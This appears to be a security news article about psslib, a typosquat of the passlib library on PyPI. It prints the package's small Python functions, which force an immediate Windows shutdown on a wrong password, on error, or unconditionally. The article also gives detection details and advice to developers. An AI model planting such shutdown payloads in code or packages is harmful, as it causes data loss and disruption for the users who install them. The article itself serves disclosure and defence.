A recent discovery has unveiled a malicious Python package named psslib on the Python Package Index (PyPI), designed to exploit Windows systems by initiating immediate shutdowns upon incorrect password entries. This package is a deceptive typosquat of the legitimate passlib library, a widely-used password hashing toolkit with over 8.9 million monthly downloads.
Typosquatting Attack Details
The threat actor, operating under the alias umaraq, published psslib to mimic passlib, aiming to deceive developers into unintentionally installing the malicious package. Typosquatting involves creating packages with names similar to popular libraries, exploiting typographical errors or reliance on autocomplete features during installation. In this case, the subtle difference between psslib and passlib increases the likelihood of accidental installation.
Malicious Functionality
Upon integration into a project, psslib introduces functions that can disrupt Windows systems:
– Password Verification Function (`spc`): This function prompts users to enter a password. If the input doesn’t match the expected value, it executes a system shutdown command, causing the machine to power off within one second.
“`python
import os
import easygui
def spc(password):
if easygui.enterbox(‘enter password:-‘) != password:
os.system(shutdown /s /t 1) # Shutdown in 1 second
“`
– Direct Shutdown Function (`src`): Executes an immediate system shutdown without requiring any user input.
“`python
def src():
os.system(shutdown /s /t 1)
“`
– Error-Induced Shutdown Function (`error`): Displays an error message and then forces a system shutdown.
“`python
import sys
def error(message):
sys.stderr.write(message)
os.system(shutdown /s /t 1)
“`
These functions ensure that the malicious payload can execute under various scenarios, leading to immediate system disruption.
Targeted Environment
The attack specifically targets Windows-based development environments, where shutdown commands are effective and often overlooked. While the payload fails harmlessly on Linux or macOS due to OS command differences, the package’s Windows-specific nature demonstrates targeted intent.
Potential Impact
The execution of these shutdown commands can result in:
– Loss of unsaved work and data
– Corruption of open files and databases
– Disruption of running services
Such immediate system shutdowns can cause significant workflow disruptions and potential data loss, especially in development environments where unsaved code and configurations are common.
Detection and Response
The malicious nature of psslib was identified by Socket’s AI-powered scanning systems, which flagged the package due to its destructive system shutdown behavior. Despite formal petitions for its removal, the package remains active on PyPI, posing ongoing risks to developers who may inadvertently install it.
Recommendations for Developers
To mitigate the risks associated with malicious packages:
1. Verify Package Names: Carefully check package names for typos or subtle differences before installation.
2. Review Package Details: Examine the package’s metadata, including the author’s information, release history, and user reviews.
3. Utilize Security Tools: Employ tools that can detect and flag potentially malicious packages.
4. Stay Informed: Keep abreast of security advisories related to the packages and libraries you use.
By adopting these practices, developers can reduce the likelihood of integrating malicious packages into their projects, thereby safeguarding their systems and data.
